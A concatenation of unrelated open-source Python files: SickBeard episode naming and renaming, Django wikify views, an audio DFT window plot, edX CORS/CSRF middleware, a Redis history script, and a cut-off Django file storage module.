myDB = db.DBConnection()
sql = "DELETE FROM tv_episodes WHERE showid="+str(self.show.tvdbid)+" AND season="+str(self.season)+" AND episode="+str(self.episode)
myDB.action(sql)
raise exceptions.EpisodeDeletedException()
def saveToDB(self, forceSave=False):
"""
Saves this episode to the database if any of its data has been changed since the last save.
forceSave: If True it will save to the database even if no data has been changed since the
last save (aka if the record is not dirty).
"""
if not self.dirty and not forceSave:
logger.log(str(self.show.tvdbid) + ": Not saving episode to db - record is not dirty", logger.DEBUG)
return
logger.log(str(self.show.tvdbid) + ": Saving episode details to database", logger.DEBUG)
logger.log(u"STATUS IS " + str(self.status), logger.DEBUG)
myDB = db.DBConnection()
newValueDict = {"tvdbid": self.tvdbid,
"name": self.name,
"description": self.description,
"subtitles": ",".join([sub for sub in self.subtitles]),
"subtitles_searchcount": self.subtitles_searchcount,
"subtitles_lastsearch": self.subtitles_lastsearch,
"airdate": self.airdate.toordinal(),
"hasnfo": self.hasnfo,
"hastbn": self.hastbn,
"status": self.status,
"location": self.location,
"scene_season": self._scene_season,
"scene_episode": self._scene_episode,
"audio_langs": self.audio_langs,
"file_size": self.file_size,
"release_name": self.release_name}
controlValueDict = {"showid": self.show.tvdbid,
"season": self.season,
"episode": self.episode}
# use a custom update/insert method to get the data into the DB
myDB.upsert("tv_episodes", newValueDict, controlValueDict)
def fullPath (self):
if self.location == None or self.location == "":
return None
else:
return ek.ek(os.path.join, self.show.location, self.location)
def prettyName(self):
"""
Returns the name of this episode in a "pretty" human-readable format. Used for logging
and notifications and such.
Returns: A string representing the episode's name and season/ep numbers
"""
return self._format_pattern('%SN - %Sx%0E - %EN')
def _ep_name(self):
"""
Returns the name of the episode to use during renaming. Combines the names of related episodes.
Eg. "Ep Name (1)" and "Ep Name (2)" becomes "Ep Name"
"Ep Name" and "Other Ep Name" becomes "Ep Name & Other Ep Name"
"""
multiNameRegex = "(.*) \(\d\)"
self.relatedEps = sorted(self.relatedEps, key=lambda x: x.episode)
if len(self.relatedEps) == 0:
goodName = self.name
else:
goodName = ''
singleName = True
curGoodName = None
for curName in [self.name] + [x.name for x in self.relatedEps]:
match = re.match(multiNameRegex, curName)
if not match:
singleName = False
break
if curGoodName == None:
curGoodName = match.group(1)
elif curGoodName != match.group(1):
singleName = False
break
if singleName:
goodName = curGoodName
else:
goodName = self.name
for relEp in self.relatedEps:
goodName += " & " + relEp.name
return goodName
def _replace_map(self):
"""
Generates a replacement map for this episode which maps all possible custom naming patterns to the correct
value for this episode.
Returns: A dict with patterns as the keys and their replacement values as the values.
"""
ep_name = self._ep_name()
def dot(name):
return helpers.sanitizeSceneName(name)
def us(name):
return re.sub('[ -]','_', name)
def release_name(name):
if name and name.lower().endswith('.nzb'):
name = name.rpartition('.')[0]
return name
def release_group(name):
if not name:
return ''
np = NameParser(name)
try:
parse_result = np.parse(name)
except InvalidNameException, e:
logger.log(u"Unable to get parse release_group: "+ex(e), logger.DEBUG)
return ''
if not parse_result.release_group:
return ''
return parse_result.release_group
epStatus, epQual = Quality.splitCompositeStatus(self.status) #@UnusedVariable
return {
'%SN': self.show.name,
'%S.N': dot(self.show.name),
'%S_N': us(self.show.name),
'%EN': ep_name,
'%E.N': dot(ep_name),
'%E_N': us(ep_name),
'%QN': Quality.qualityStrings[epQual],
'%Q.N': dot(Quality.qualityStrings[epQual]),
'%Q_N': us(Quality.qualityStrings[epQual]),
'%S': str(self.season),
'%0S': '%02d' % self.season,
'%E': str(self.episode),
'%0E': '%02d' % self.episode,
'%RN': release_name(self.release_name),
'%RG': release_group(self.release_name),
'%AD': str(self.airdate).replace('-', ' '),
'%A.D': str(self.airdate).replace('-', '.'),
'%A_D': us(str(self.airdate)),
'%A-D': str(self.airdate),
'%Y': str(self.airdate.year),
'%M': str(self.airdate.month),
'%D': str(self.airdate.day),
'%0M': '%02d' % self.airdate.month,
'%0D': '%02d' % self.airdate.day,
}
def _format_string(self, pattern, replace_map):
"""
Replaces all template strings with the correct value
"""
result_name = pattern
# do the replacements
for cur_replacement in sorted(replace_map.keys(), reverse=True):
result_name = result_name.replace(cur_replacement, helpers.sanitizeFileName(replace_map[cur_replacement]))
result_name = result_name.replace(cur_replacement.lower(), helpers.sanitizeFileName(replace_map[cur_replacement].lower()))
return result_name
def _format_pattern(self, pattern=None, multi=None):
"""
Manipulates an episode naming pattern and then fills the template in
"""
if pattern == None:
pattern = sickbeard.NAMING_PATTERN
if multi == None:
multi = sickbeard.NAMING_MULTI_EP
replace_map = self._replace_map()
result_name = pattern
# if there's no release group then replace it with a reasonable facsimile
if not replace_map['%RN']:
if self.show.air_by_date:
result_name = result_name.replace('%RN', '%S.N.%A.D.%E.N')
result_name = result_name.replace('%rn', '%s.n.%A.D.%e.n')
else:
result_name = result_name.replace('%RN', '%S.N.S%0SE%0E.%E.N')
result_name = result_name.replace('%rn', '%s.n.s%0se%0e.%e.n')
result_name = result_name.replace('%RG', '')
result_name = result_name.replace('%rg', '')
if result_name[-1] in ['.','-','_',' ']:
result_name = result_name[:-1]
logger.log(u"Episode has no release name, replacing it with a generic one: "+result_name, logger.DEBUG)
# split off ep name part only
name_groups = re.split(r'[\\/]', result_name)
# figure out the double-ep numbering style for each group, if applicable
for cur_name_group in name_groups:
season_format = sep = ep_sep = ep_format = None
season_ep_regex = '''
(?P<pre_sep>[ _.-]*)
((?:s(?:eason|eries)?\s*)?%0?S(?![._]?N))
(.*?)
(%0?E(?![._]?N))
(?P<post_sep>[ _.-]*)
'''
ep_only_regex = '(E?%0?E(?![._]?N))'
# try the normal way
season_ep_match = re.search(season_ep_regex, cur_name_group, re.I|re.X)
ep_only_match = re.search(ep_only_regex, cur_name_group, re.I|re.X)
# if we have a season and episode then collect the necessary data
if season_ep_match:
season_format = season_ep_match.group(2)
ep_sep = season_ep_match.group(3)
ep_format = season_ep_match.group(4)
sep = season_ep_match.group('pre_sep')
if not sep:
sep = season_ep_match.group('post_sep')
if not sep:
sep = ' '
# force 2-3-4 format if they chose to extend
if multi in (NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED):
ep_sep = '-'
regex_used = season_ep_regex
# if there's no season then there's not much choice so we'll just force them to use 03-04-05 style
elif ep_only_match:
season_format = ''
ep_sep = '-'
ep_format = ep_only_match.group(1)
sep = ''
regex_used = ep_only_regex
else:
continue
# we need at least this much info to continue
if not ep_sep or not ep_format:
continue
# start with the ep string, eg. E03
ep_string = self._format_string(ep_format.upper(), replace_map)
for other_ep in self.relatedEps:
# for limited extend we only append the last ep
if multi in (NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED) and other_ep != self.relatedEps[-1]:
continue
elif multi == NAMING_DUPLICATE:
# add " - S01"
ep_string += sep + season_format
elif multi == NAMING_SEPARATED_REPEAT:
ep_string += sep
# add "E04"
ep_string += ep_sep
if multi == NAMING_LIMITED_EXTEND_E_PREFIXED:
ep_string += 'E'
ep_string += other_ep._format_string(ep_format.upper(), other_ep._replace_map())
if season_ep_match:
regex_replacement = r'\g<pre_sep>\g<2>\g<3>' + ep_string + r'\g<post_sep>'
elif ep_only_match:
regex_replacement = ep_string
# fill out the template for this piece and then insert this piece into the actual pattern
cur_name_group_result = re.sub('(?i)(?x)'+regex_used, regex_replacement, cur_name_group)
#cur_name_group_result = cur_name_group.replace(ep_format, ep_string)
#logger.log(u"found "+ep_format+" as the ep pattern using "+regex_used+" and replaced it with "+regex_replacement+" to result in "+cur_name_group_result+" from "+cur_name_group, logger.DEBUG)
result_name = result_name.replace(cur_name_group, cur_name_group_result)
result_name = self._format_string(result_name, replace_map)
logger.log(u"formatting pattern: "+pattern+" -> "+result_name, logger.DEBUG)
return result_name
def proper_path(self):
"""
Figures out the path where this episode SHOULD live according to the renaming rules, relative from the show dir
"""
result = self.formatted_filename()
# if they want us to flatten it and we're allowed to flatten it then we will
if self.show.flatten_folders and not sickbeard.NAMING_FORCE_FOLDERS:
return result
# if not we append the folder on and use that
else:
result = ek.ek(os.path.join, self.formatted_dir(), result)
return result
def formatted_dir(self, pattern=None, multi=None):
"""
Just the folder name of the episode
"""
if pattern == None:
# we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep
if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps:
pattern = sickbeard.NAMING_ABD_PATTERN
else:
pattern = sickbeard.NAMING_PATTERN
# split off the dirs only, if they exist
name_groups = re.split(r'[\\/]', pattern)
if len(name_groups) == 1:
return ''
else:
return self._format_pattern(os.sep.join(name_groups[:-1]), multi)
def formatted_filename(self, pattern=None, multi=None):
"""
Just the filename of the episode, formatted based on the naming settings
"""
if pattern == None:
# we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep
if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps:
pattern = sickbeard.NAMING_ABD_PATTERN
else:
pattern = sickbeard.NAMING_PATTERN
# split off the filename only, if they exist
name_groups = re.split(r'[\\/]', pattern)
return self._format_pattern(name_groups[-1], multi)
def rename(self):
"""
Renames an episode file and all related files to the location and filename as specified
in the naming settings.
"""
if not ek.ek(os.path.isfile, self.location):
logger.log(u"Can't perform rename on " + self.location + " when it doesn't exist, skipping", logger.WARNING)
return
proper_path = self.proper_path()
absolute_proper_path = ek.ek(os.path.join, self.show.location, proper_path)
absolute_current_path_no_ext, file_ext = os.path.splitext(self.location)
related_subs = []
current_path = absolute_current_path_no_ext
if absolute_current_path_no_ext.startswith(self.show.location):
current_path = absolute_current_path_no_ext[len(self.show.location):]
logger.log(u"Renaming/moving episode from the base path " + self.location + " to " + absolute_proper_path, logger.DEBUG)
# if it's already named correctly then don't do anything
if proper_path == current_path:
logger.log(str(self.tvdbid) + ": File " + self.location + " is already named correctly, skipping", logger.DEBUG)
return
related_files = postProcessor.PostProcessor(self.location)._list_associated_files(self.location)
if self.show.subtitles and sickbeard.SUBTITLES_DIR != '':
related_subs = postProcessor.PostProcessor(self.location)._list_associated_files(sickbeard.SUBTITLES_DIR, subtitles_only=self.location)
absolute_proper_subs_path = ek.ek(os.path.join, sickbeard.SUBTITLES_DIR, self.formatted_filename())
if self.show.subtitles and sickbeard.SUBTITLES_DIR_SUB:
related_subs = postProcessor.PostProcessor(self.location)._list_associated_files(os.path.join(os.path.dirname(self.location),"Subs"), subtitles_only=self.location)
absolute_proper_subs_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename())
logger.log(u"Files associated to " + self.location + ": " + str(related_files), logger.DEBUG)
# move the ep file
result = helpers.rename_ep_file(self.location, absolute_proper_path)
# move related files
for cur_related_file in related_files:
cur_result = helpers.rename_ep_file(cur_related_file, absolute_proper_path)
if cur_result == False:
logger.log(str(self.tvdbid) + ": Unable to rename file " + cur_related_file, logger.ERROR)
for cur_related_sub in related_subs:
cur_result = helpers.rename_ep_file(cur_related_sub, absolute_proper_subs_path)
if cur_result == False:
logger.log(str(self.tvdbid) + ": Unable to rename file " + cur_related_sub, logger.ERROR)
# save the ep
with self.lock:
if result != False:
self.location = absolute_proper_path + file_ext
for relEp in self.relatedEps:
relEp.location = absolute_proper_path + file_ext
# in case something changed with the metadata just do a quick check
for curEp in [self] + self.relatedEps:
curEp.checkForMetaFiles()
# save any changes to the database
with self.lock:
self.saveToDB()
for relEp in self.relatedEps:
relEp.saveToDB()
|
from django.shortcuts import render_to_response
from django.http import HttpResponseBadRequest, HttpResponseRedirect, Http404
from django.template import RequestContext
from django.db import transaction
from django.core import paginator
from reversion import models
from reversion import revision
from wikify.models import VersionMeta
from wikify import utils
@transaction.commit_on_success
def edit(request, model, object_id):
"""Edit or create a page."""
form_class = utils.get_model_wiki_form(model)
version = None
if request.method == 'POST':
try:
page = model.objects.get(pk=object_id)
except model.DoesNotExist:
page = model(pk=object_id)
form = form_class(request.POST, instance=page)
if form.is_valid():
with revision:
# Save the author, use our metadata model if user is anonymous
if not request.user.is_anonymous():
revision.user = request.user
else:
ip_address = request.META.get('HTTP_X_FORWARDED_FOR',
request.META.get('REMOTE_ADDR'))
if ip_address:
revision.add_meta(VersionMeta,
ip_address=ip_address)
# Save a comment for the revision
if form.cleaned_data.get('wikify_comment'):
revision.comment = form.cleaned_data['wikify_comment']
form.save()
# Successfully saved the page, now return to the 'read' view
return HttpResponseRedirect(request.path)
else:
if request.GET.get('version_id'):
# User is editing the page based on an older version
try:
version_id = int(request.GET.get('version_id'))
version = (models.Version.objects.get_for_object_reference(
model, object_id)
.get(id=version_id))
page = version.object_version.object
except (ValueError, models.Version.DoesNotExist):
raise Http404('Version not found')
form = form_class(instance=page)
else:
try:
page = model.objects.get(pk=object_id)
form = form_class(instance=page)
except model.DoesNotExist:
form = form_class()
return render_to_response('wikify/edit.html',
{'form': form,
'object_id': object_id,
'version': version},
context_instance=RequestContext(request))
def version(request, model, object_id):
"""Returns a versioned view of the given instance."""
try:
version_id = int(request.GET.get('version_id'))
version = (models.Version.objects.get_for_object_reference(model,
object_id)
.get(id=version_id))
instance = version.object_version.object
except (ValueError, models.Version.DoesNotExist):
raise Http404('Version not found')
return render_to_response('wikify/version.html',
{'instance': instance,
'fields': list(utils.model_field_iterator(
instance)),
'version': version},
context_instance=RequestContext(request))
def versions(request, model, object_id, paginate=20):
"""Returns a paginated list of all versions of the given instance."""
all_versions = (models.Version.objects.get_for_object_reference(model,
object_id)
.reverse()
.select_related("revision"))
p = paginator.Paginator(all_versions, paginate)
page_no = request.GET.get('page', 1)
try:
versions = p.page(page_no)
except paginator.PageNotAnInteger:
versions = p.page(1)
except paginator.EmptyPage:
versions = p.page(p.num_pages)
return render_to_response('wikify/versions.html',
{'object_id': object_id,
'versions': versions},
context_instance=RequestContext(request))
def diff(request, model, object_id):
"""Returns the difference between the given version and the previous one."""
versions = models.Version.objects.get_for_object_reference(model, object_id)
try:
version_id = int(request.GET.get('version_id'))
# Get version and make sure it belongs to the given page
new_version = versions.get(id=version_id)
except (ValueError, models.Version.DoesNotExist):
raise Http404("Version not found")
old_version_q = versions.filter(id__lt=version_id).reverse()
old_version = old_version_q[0] if old_version_q else None
# Get the next version so we can provide a link
next_version_q = versions.filter(id__gt=version_id)
next_version = next_version_q[0] if next_version_q else None
context = {'old_version': old_version,
'new_version': new_version,
'fields': list(utils.version_field_iterator(old_version,
new_version)),
'next_version': next_version}
return render_to_response('wikify/diff.html',
context,
context_instance=RequestContext(request))
|
import matplotlib.pyplot as plt
import numpy as np
import time, os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../../software/models/'))
import dftModel as DF
import utilFunctions as UF
from scipy.fftpack import fft, ifft
import math
(fs, x) = UF.wavread('../../../sounds/oboe-A4.wav')
N = 512
pin = 5000
w = np.ones(501)
hM1 = int(math.floor((w.size+1)/2))
hM2 = int(math.floor(w.size/2))
x1 = x[pin-hM1:pin+hM2]
plt.figure(1, figsize=(9.5, 7))
plt.subplot(4,1,1)
plt.plot(np.arange(-hM1, hM2), x1, lw=1.5)
plt.axis([-hM1, hM2, min(x1), max(x1)])
plt.title('x (oboe-A4.wav)')
mX, pX = DF.dftAnal(x1, w, N)
mX = mX - max(mX)
plt.subplot(4,1,2)
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,N/4,-70,0])
plt.title ('mX (rectangular window)')
w = np.hamming(501)
mX, pX = DF.dftAnal(x1, w, N)
mX = mX - max(mX)
plt.subplot(4,1,3)
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,N/4,-70,0])
plt.title ('mX (hamming window)')
w = np.blackman(501)
mX, pX = DF.dftAnal(x1, w, N)
mX = mX - max(mX)
plt.subplot(4,1,4)
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,N/4,-70,0])
plt.title ('mX (blackman window)')
plt.tight_layout()
plt.savefig('windows.png')
plt.show()
|
"""
Middleware for handling CSRF checks with CORS requests
CSRF and referrer domain checks
-------------------------------
When processing HTTPS requests, the default CSRF middleware checks that the referer
domain and protocol is the same as the request's domain and protocol. This is meant
to avoid a type of attack for sites which serve their content with both HTTP and HTTPS,
with a man in the middle on the HTTP requests.
https://github.com/django/django/blob/b91c385e324f1cb94d20e2ad146372c259d51d3b/django/middleware/csrf.py#L117
This doesn't work well with CORS requests, which aren't vulnerable to this attack when
the server from which the request is coming uses HTTPS too, as it prevents the man in the
middle attack vector.
We thus do the CSRF check of requests coming from an authorized CORS host separately
in this middleware, applying the same protections as the default CSRF middleware, but
without the referrer check, when both the request and the referer use HTTPS.
CSRF cookie domains
-------------------
In addition, in order to make cross-domain AJAX calls to CSRF-protected end-points,
we need to send the CSRF token in the HTTP header of the request.
The simple way to do this would be to set the CSRF_COOKIE_DOMAIN to ".edx.org",
but unfortunately this can cause problems. For example, suppose that
"first.edx.org" sets the cookie with domain ".edx.org", but "second.edx.org"
sets a cookie with domain "second.edx.org". In this case, the browser
would have two different CSRF tokens set (one for each cookie domain),
which can cause non-deterministic failures depending on which cookie
is sent first.
For this reason, we add a second cookie that (a) has the domain set to ".edx.org",
but (b) does NOT have the same name as the CSRF_COOKIE_NAME. Clients making
cross-domain requests can use this cookie instead of the subdomain-specific
CSRF cookie.
"""
import logging
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured, MiddlewareNotUsed
from .helpers import is_cross_domain_request_allowed, skip_cross_domain_referer_check
# TODO: Remove Django 1.11 upgrade shim
# SHIM: Remove birdcage references post-1.11 upgrade as it is only in place to help during that deployment
if django.VERSION < (1, 9):
from birdcage.v1_11.csrf import CsrfViewMiddleware
else:
from django.middleware.csrf import CsrfViewMiddleware
log = logging.getLogger(__name__)
class CorsCSRFMiddleware(CsrfViewMiddleware):
"""
Middleware for handling CSRF checks with CORS requests
"""
def __init__(self):
"""Disable the middleware if the feature flag is disabled. """
if not settings.FEATURES.get('ENABLE_CORS_HEADERS'):
raise MiddlewareNotUsed()
def process_view(self, request, callback, callback_args, callback_kwargs):
"""Skip the usual CSRF referer check if this is an allowed cross-domain request. """
if not is_cross_domain_request_allowed(request):
log.debug("Could not disable CSRF middleware referer check for cross-domain request.")
return
with skip_cross_domain_referer_check(request):
return super(CorsCSRFMiddleware, self).process_view(request, callback, callback_args, callback_kwargs)
class CsrfCrossDomainCookieMiddleware(object):
"""Set an additional "cross-domain" CSRF cookie.
Usage:
1) Decorate a view with `@ensure_csrf_cookie_cross_domain`.
2) Set `CROSS_DOMAIN_CSRF_COOKIE_NAME` and `CROSS_DOMAIN_CSRF_COOKIE_DOMAIN`
in settings.
3) Add the domain to `CORS_ORIGIN_WHITELIST`
4) Enable `FEATURES['ENABLE_CROSS_DOMAIN_CSRF_COOKIE']`
For testing, it is often easier to relax the security checks by setting:
* `CORS_ALLOW_INSECURE = True`
* `CORS_ORIGIN_ALLOW_ALL = True`
"""
def __init__(self):
"""Disable the middleware if the feature is not enabled. """
if not settings.FEATURES.get('ENABLE_CROSS_DOMAIN_CSRF_COOKIE'):
raise MiddlewareNotUsed()
if not getattr(settings, 'CROSS_DOMAIN_CSRF_COOKIE_NAME', ''):
raise ImproperlyConfigured(
"You must set `CROSS_DOMAIN_CSRF_COOKIE_NAME` when "
"`FEATURES['ENABLE_CROSS_DOMAIN_CSRF_COOKIE']` is True."
)
if not getattr(settings, 'CROSS_DOMAIN_CSRF_COOKIE_DOMAIN', ''):
raise ImproperlyConfigured(
"You must set `CROSS_DOMAIN_CSRF_COOKIE_DOMAIN` when "
"`FEATURES['ENABLE_CROSS_DOMAIN_CSRF_COOKIE']` is True."
)
def process_response(self, request, response):
"""Set the cross-domain CSRF cookie. """
# Check whether this is a secure request from a domain on our whitelist.
if not is_cross_domain_request_allowed(request):
log.debug("Could not set cross-domain CSRF cookie.")
return response
# Check whether (a) the CSRF middleware has already set a cookie, and
# (b) this is a view decorated with `@ensure_cross_domain_csrf_cookie`
# If so, we can send the cross-domain CSRF cookie.
should_set_cookie = (
request.META.get('CROSS_DOMAIN_CSRF_COOKIE_USED', False) and
request.META.get('CSRF_COOKIE_USED', False) and
request.META.get('CSRF_COOKIE') is not None
)
if should_set_cookie:
# This is very similar to the code in Django's CSRF middleware
# implementation, with two exceptions:
# 1) We change the cookie name and domain so it can be used cross-domain.
# 2) We always set "secure" to True, so that the CSRF token must be
# sent over a secure connection.
response.set_cookie(
settings.CROSS_DOMAIN_CSRF_COOKIE_NAME,
request.META['CSRF_COOKIE'],
max_age=settings.CSRF_COOKIE_AGE,
domain=settings.CROSS_DOMAIN_CSRF_COOKIE_DOMAIN,
path=settings.CSRF_COOKIE_PATH,
secure=True
)
log.debug(
"Set cross-domain CSRF cookie '%s' for domain '%s'",
settings.CROSS_DOMAIN_CSRF_COOKIE_NAME,
settings.CROSS_DOMAIN_CSRF_COOKIE_DOMAIN
)
return response
|
#!/usr/bin/env python
# encoding: utf-8
# Copyright 2014 Xinyu, He <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import json
import redis
HISTORY_CMD_KEY = "lehome:cmd_history_list"
r = redis.Redis(host='localhost', port=6379)
print "dbsize:", r.dbsize()
print "num of keys:", r.keys()
print "volume:", r.get("lehome:last_volume")
historys = r.lrange(HISTORY_CMD_KEY, 0, -1)
print "history size:", len(historys)
# r.delete(HISTORY_CMD_KEY)
for i in range(1, 10):
print historys[-i]
look_up_dict = {}
for item in historys:
item = item.split(":")
stmp = int(item[0])
cmd = item[1]
if cmd not in look_up_dict:
look_up_dict[cmd] = {'count': 0}
look_up_dict[cmd]['count'] = look_up_dict[cmd]['count'] + 1
print "dict size:", len(look_up_dict)
with open("../usr/history.json", "w") as f:
f.write(json.dumps(look_up_dict))
|
import errno
import os
import warnings
from datetime import datetime
from django.conf import settings
from django.core.exceptions import SuspiciousFileOperation
from django.core.files import File, locks
from django.core.files.move import file_move_safe
from django.core.signals import setting_changed
from django.utils import timezone
from django.utils._os import abspathu, safe_join
from django.utils.crypto import get_random_string
from django.utils.deconstruct import deconstructible
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import filepath_to_uri, force_text
from django.utils.functional import LazyObject, cached_property
from django.utils.module_loading import import_string
from django.utils.six.moves.urllib.parse import urljoin
from django.utils.text import get_valid_filename
__all__ = ('Storage', 'FileSystemStorage', 'DefaultStorage', 'default_storage')
class Storage(object):
"""
A base storage class, providing some default behaviors that all other
storage systems can inherit or override, as necessary.
"""
# The following methods represent a public interface to private methods.
# These shouldn't be overridden by subclasses unless absolutely necessary.
def open(self, name, mode='rb'):
"""
Retrieves the specified file from storage.
"""
return self._open(name, mode)
def save(self, name, content, max_length=None):
"""
Saves new content to the file specified by name. The content should be
a proper File object or any python file-like object, ready to be read
from the beginning.
"""
# Get the proper name for the file, as it will actually be saved.
if name is None:
name = content.name
if not hasattr(content, 'chunks'):
content = File(content)
name = self.get_available_name(name, max_length=max_length)
name = self._save(name, content)
# Store filenames with forward slashes, even on Windows
return force_text(name.replace('\\', '/'))
# These methods are part of the public API, with default implementations.
def get_valid_name(self, name):
"""
Returns a filename, based on the provided filename, that's suitable for
use in the target storage system.
"""
return get_valid_filename(name)
def get_available_name(self, name, max_length=None):
"""
Returns a filename that's free on the target storage system, and
available for new content to be written to.
"""
dir_name, file_name = os.path.split(name)
file_root, file_ext = os.path.splitext(file_name)
# If the filename already exists, add an underscore and a random 7
# character alphanumeric string (before the file extension, if one
# exists) to the filename until the generated filename doesn't exist.
# Truncate original name if required, so the new filename does not
# exceed the max_length.
while self.exists(name) or (max_length and len(name) > max_length):
# file_ext includes the dot.
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
if max_length is None:
continue
# Truncate file_root if max_length exceeded.
truncation = len(name) - max_length
if truncation > 0:
file_root = file_root[:-truncation]
# Entire file_root was truncated in attempt to find an available filename.
if not file_root:
raise SuspiciousFileOperation(
'Storage can not find an available filename for "%s". '
'Please make sure that the corresponding file field '
'allows sufficient "max_length".' % name
)
name = os.path.join(dir_name, "%s_%s%s" % (file_root, get_random_string(7), file_ext))
return name
def path(self, name):
"""
Returns a local filesystem path where the file can be retrieved using
Python's built-in open() function. Storage systems that can't be
accessed using open() should *not* implement this method.
"""
raise NotImplementedError("This backend doesn't support absolute paths.")
# The following methods form the public API for storage systems, but with
# no default implementations. Subclasses must implement *all* of these.
def delete(self, name):
"""
Deletes the specified file from the storage system.
"""
raise NotImplementedError('subclasses of Storage must provide a delete() method')
def exists(self, name):
"""
Returns True if a file referenced by the given name already exists in the
storage system, or False if the name is available for a new file.
"""
raise NotImplementedError('subclasses of Storage must provide an exists() method')
def listdir(self, path):
"""
Lists the contents of the specified path, returning a 2-tuple of lists;
the first item being directories, the second item being files.
"""
raise NotImplementedError('subclasses of Storage must provide a listdir() method')
def size(self, name):
"""
Returns the total size, in bytes, of the file specified by name.
"""
raise NotImplementedError('subclasses of Storage must provide a size() method')
def url(self, name):
"""
Returns an absolute URL where the file's contents can be accessed
directly by a Web browser.
"""
raise NotImplementedError('subclasses of Storage must provide a url() method')
def accessed_time(self, name):
"""
Returns the last accessed time (as datetime object) of the file
specified by name. Deprecated: use get_accessed_time() instead.
"""
warnings.warn(
'Storage.accessed_time() is deprecated in favor of get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide an accessed_time() method')
def created_time(self, name):
"""
Returns the creation time (as datetime object) of the file
specified by name. Deprecated: use get_created_time() instead.
"""
warnings.warn(
'Storage.created_time() is deprecated in favor of get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a created_time() method')
def modified_time(self, name):
"""
Returns the last modified time (as datetime object) of the file
specified by name. Deprecated: use get_modified_time() instead.
"""
warnings.warn(
'Storage.modified_time() is deprecated in favor of get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
raise NotImplementedError('subclasses of Storage must provide a modified_time() method')
def get_accessed_time(self, name):
"""
Return the last accessed time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_accessed_time() method')
warnings.warn(
'Storage.accessed_time() is deprecated. '
'Storage backends should implement get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.accessed_time(name)
return _possibly_make_aware(dt)
def get_created_time(self, name):
"""
Return the creation time (as a datetime) of the file specified by name.
The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_created_time() method')
warnings.warn(
'Storage.created_time() is deprecated. '
'Storage backends should implement get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.created_time(name)
return _possibly_make_aware(dt)
def get_modified_time(self, name):
"""
Return the last modified time (as a datetime) of the file specified by
name. The datetime will be timezone-aware if USE_TZ=True.
"""
# At the end of the deprecation:
# raise NotImplementedError('subclasses of Storage must provide a get_modified_time() method')
warnings.warn(
'Storage.modified_time() is deprecated. '
'Storage backends should implement get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
dt = self.modified_time(name)
return _possibly_make_aware(dt)
def _possibly_make_aware(dt):
"""
Convert a datetime object in the local timezone to aware
in UTC, if USE_TZ is True.
"""
# This function is only needed to help with the deprecations above and can
# be removed in Django 2.0, RemovedInDjango20Warning.
if settings.USE_TZ:
tz = timezone.get_default_timezone()
return timezone.make_aware(dt, tz).astimezone(timezone.utc)
else:
return dt
@deconstructible
class FileSystemStorage(Storage):
"""
Standard filesystem storage
"""
def __init__(self, location=None, base_url=None, file_permissions_mode=None,
directory_permissions_mode=None):
self._location = location
if base_url is not None and not base_url.endswith('/'):
base_url += '/'
self._base_url = base_url
self._file_permissions_mode = file_permissions_mode
self._directory_permissions_mode = directory_permissions_mode
setting_changed.connect(self._clear_cached_properties)
def _clear_cached_properties(self, setting, **kwargs):
"""Reset setting based property values."""
if setting == 'MEDIA_ROOT':
self.__dict__.pop('base_location', None)
self.__dict__.pop('location', None)
elif setting == 'MEDIA_URL':
self.__dict__.pop('base_url', None)
elif setting == 'FILE_UPLOAD_PERMISSIONS':
self.__dict__.pop('file_permissions_mode', None)
elif setting == 'FILE_UPLOAD_DIRECTORY_PERMISSIONS':
self.__dict__.pop('directory_permissions_mode', None)
def _value_or_setting(self, value, setting):
return setting if value is None else value
@cached_property
def base_location(self):
return self._value_or_setting(self._location, settings.MEDIA_ROOT)
@cached_property
def location(self):
return abspathu(self.base_location)
@cached_property
def base_url(self):
return self._value_or_setting(self._base_url, settings.MEDIA_URL)
@cached_property
def file_permissions_mode(self):
return self._value_or_setting(self._file_permissions_mode, settings.FILE_UPLOAD_PERMISSIONS)
@cached_property
def directory_permissions_mode(self):
return self._value_or_setting(self._directory_permissions_mode, settings.FILE_UPLOAD_DIRECTORY_PERMISSIONS)
def _open(self, name, mode='rb'):
return File(open(self.path(name), mode))
def _save(self, name, content):
full_path = self.path(name)
# Create any intermediate directories that do not exist.
# Note that there is a race between os.path.exists and os.makedirs:
# if os.makedirs fails with EEXIST, the directory was created
# concurrently, and we can continue normally. Refs #16082.
directory = os.path.dirname(full_path)
if not os.path.exists(directory):
try:
if self.directory_permissions_mode is not None:
# os.makedirs applies the global umask, so we reset it,
# for consistency with file_permissions_mode behavior.
old_umask = os.umask(0)
try:
os.makedirs(directory, self.directory_permissions_mode)
finally:
